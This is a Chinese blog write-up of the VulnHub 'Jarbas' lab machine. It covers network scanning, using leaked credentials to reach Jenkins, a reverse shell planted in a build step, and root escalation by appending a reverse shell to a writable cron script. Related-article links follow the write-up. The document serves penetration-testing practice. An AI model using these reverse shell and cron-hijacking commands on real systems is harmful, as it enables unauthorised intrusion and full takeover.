vulhub靶场jarbas-计划任务提权

最新推荐文章于 2024-10-01 18:51:18 发布
最新推荐文章于 2024-10-01 18:51:18 发布
阅读量445 收藏 9
点赞数 8
文章标签: java 前端 服务器 linux 网络 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55349490/article/details/139331930
版权

目录


靶机下载: Jarbas: 1 ~ VulnHub
提升条件:Web或用户权限进行查看,计划任务文件可修改

1、信息收集:

工具扫描

nmap扫描

nmap 192.168.0.0/24 
扫描出靶机ip 192.168.0.7


访问网站

dirsearch扫描
python dirsearch.py -u 192.168.0.7

访问后台

这里泄露了用户名密码(密码是md5加密)

登录网站是 8080端口

2、获取权限

登录后台

获取webshell

参考文章:Jenkins拿shell方法-腾讯云开发者社区-腾讯云
构建shell时要根据靶机的系统选择,我这里是linux靶机,选择第二个

写反弹命令
反弹shell生成器

sh -i >& /dev/tcp/192.168.0.4/5555 0>&1
kali开启监听
nc -lvvp 5555

保存-》立即构建

获得shell

3、权限提升:

计划任务提权

cat /etc/crontab //查看计划任务

ls -lia /etc/script/CleaningScript.sh //查看权限
查看权限发现可以修改计划任务

echo "/bin/bash -i >& /dev/tcp/192.168.0.4/5544 0>&1" >> /etc/script/CleaningScript.sh //修改计划任务
修改计划任务,kali监听5544端口
提权成功

为几何欢
关注
vulnhub渗透系列之DC(一) :内含suid的三种提权方法
来到了学渣的博客
01-25 2974
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决 2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框 架,版本是7.x但不确定是哪个x 3.利用searchsp...
记一次vulnhub|渗透测试DC-4(常规和非预期提权思路)
crispr的博客
02-02 996
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地提权
Jarbas-靶场
qq_46187131的博客
03-18 985
首先nmap做端口扫描,发现80和8080两个端口开放通过两个端口的Web浏览和目录扫描,发现8080是内容管理系统通过目录扫描得知账号密码,并成功登录新建一个项目的时候,写进了反弹shell,并拿到初始shell的权限收集提权信息发现自动任务有root权限运行的,并进行利用,写入shell成功拿到root权限,并查看flag。
【甄选靶场Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权
人间体佐菲的博客
01-18 1853
Vulnhub百个项目渗透——项目五十四:jarbas-1(类git反弹shell,计划任务提权
渗透靶场Jarbas
m0_56190544的博客
07-09 564
完整的解析了vulnhub靶场中的Jarbas的渗透过程,包括一些命令使用的细节,提供大家借鉴学习!
Vulnhub - Jarbas
qq_46081990的博客
03-16 381
Nmap扫描目标主机,发现开放22、80、8080、3306端口,分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务,目标操作系统为Linux。因开放3306端口,猜测可能为MySQL账号密码,尝试连接但失败。对于类Github的中间件,比如上个靶场Devguru的Gitea,都可以去寻找有没有命令执行的地方,然后尝试反弹shell。将bash反弹命令追加到后面去,Kali这边nc监听5555端口,等待一段时间,成功收到会话拿到root权限和flag。
红队渗透靶场Jarbas靶场(超详细)
xf555er的博客
11-26 1413
Jarbas靶场演练, 红队渗透必学靶场
jarbas--靶机实操详解
qq_61802750的博客
10-12 314
枚举类型通常用于为程序中的一组相关的常量取名字,以便于程序的可读性和维护性。我们看到,最下边有条记录,每五分钟以root的权限,执行这个shell脚本,执行结果就是把它扔掉。80端口是http,攻击面很大,可以优先考虑。我们现在就在jackson这个账户,有不正常的交互。我们去识别一下下面的字符,看看是什么加密方式,不出意外的话就是MD5。我们试一下,使用eder账号,密码使用vipsu。那我们再写入一个shell,打开监听,看看是否是root权限。index是我们当前的页面,我们先访问一下access。
[vulnhub] Jarbas-Jenkins
weixin_46099552的博客
09-21 1093
Vulnhub
PyPI 官网下载 | jarbas_hive_mind-0.3.5.tar.gz
02-01
《PyPI上的jarbas_hive_mind-0.3.5.tar.gz:探索Hadoop大数据世界的工具》 PyPI(Python Package Index)是Python开发者的重要资源库,它为全球的Python程序员提供了丰富的软件包和模块。在PyPI上,我们可以找到名...
论文研究 - 加强高中地理制图的使用
05-19
首先,根据Jarbas Passarinho School高中2年级学生研究的教科书内容,这项工作基于针对性文献综述,通过使用人造卫星(Google Earth)的图像开展实际活动来开展。 在进行此类活动时,已经注意到学生和老师在处理...
渗透测试-Jarbas靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-18 1299
Jarbas靶机渗透1.环境部署2.信息收集3.开始测试80端口8080端口4.提权 1.环境部署 靶机下载地址:点此下载(建议使用迅雷下载) 攻击机:Kali 2019.2 amd64 靶机 : Jarbas靶机 目标:拿下靶机root权限和里面的flag 2.信息收集 使用arp-scan -l进行局域网主机发现 192.168.0.100这个地址是靶机地址 使用nmap进行端口扫描 目录...
Vulnhub靶机系列:Jarbas1.0
汗的博客
04-26 826
这次的靶机是vulnhub靶机:Jarbas1.0,因为合天有在线靶机,就直接用合天的在线靶机了。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/jarbas-1,232/ If you want to keep your hacking studies, please try out...
JavaScript ArrayBuffer的读写与类型转换
最新发布
白瑕 的博客
10-01 420
所有视图的基本单位是ArrayBuffer, ArrayBuffer中只存储二进制格式的数据.ArrayBuffer不可直接读写, 必须通过视图(比如DataView)暴露的API.
spring-boot 整合 mybatis
m0_72168501的博客
09-29 529
spring boot 整合 mybatis
Java内存布局
阿呆的专栏
10-01 793
64位 JVM 不启用指针压缩时:Object Header 大小是16字节。64位 JVM 启用指针压缩时(默认):Object Header 大小是12字节。32位 JVM:Object Header 大小是8字节。JVM在默认情况下启用指针压缩,但如果堆内存超过32GB,就会禁用指针压缩。32GB是压缩指针的最大寻址范围。超过32GB的堆内存中,压缩指针带来的性能提升并不显著,而且需要解压指针反而可能增加开销。
【开源免费】基于SpringBoot+Vue.JS校园资料分享平台(JAVA毕业设计)
customer08的博客
09-30 1239
校园资料分享平台是一个B/S模式系统,采用Spring Boot框架作为开发技术,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得校园资料分享平台管理工作系统化、规范化。
C#基础:掌握控制流语句,构建灵活的程序逻辑
学习和分享
09-28 325
在C#中,控制流语句是用来控制程序执行流程的重要部分。它们允许你根据条件执行不同的代码块,或者重复执行某些代码块直到满足特定条件。
进程管理工具:非daemon进程管理工具supervisor
happy_king_zi的博客
09-29 1108
supervisor是一个 Client/Server模式的系统,允许用户在类unix操作系统上监视和控制多个进程,或者可以说是多个程序。supervisor与launchd,daemontools,runit等程序有着相同的功能,与其中某些程序不同的是,它并不作为“id 为 1的进程”而替代init。相反,它用于控制应用程序,像启动其它程序一样,通俗理解就是,把Supervisor服务管理的进程程序,它们作为supervisor的子进程来运行,而supervisor是父进程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值